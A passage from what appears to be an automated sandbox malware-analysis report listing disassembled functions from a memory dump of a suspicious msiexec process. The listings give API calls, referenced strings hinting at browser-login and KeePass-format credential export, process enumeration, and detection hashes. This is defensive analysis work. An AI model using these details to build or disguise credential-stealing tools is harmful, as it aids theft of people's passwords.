                                                                                                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                                                • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                                                • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                • String ID: logins$null
                                                                                                                                                • API String ID: 2148543256-2163367763
                                                                                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID: ---
                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1010922700-0
                                                                                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                • free.MSVCRT ref: 004186C7
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                • free.MSVCRT ref: 004186E0
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                • free.MSVCRT ref: 00418716
                                                                                                                                                • free.MSVCRT ref: 0041872A
                                                                                                                                                • free.MSVCRT ref: 00418749
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 3356672799-1717621600
                                                                                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2012295524-70141382
                                                                                                                                                • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
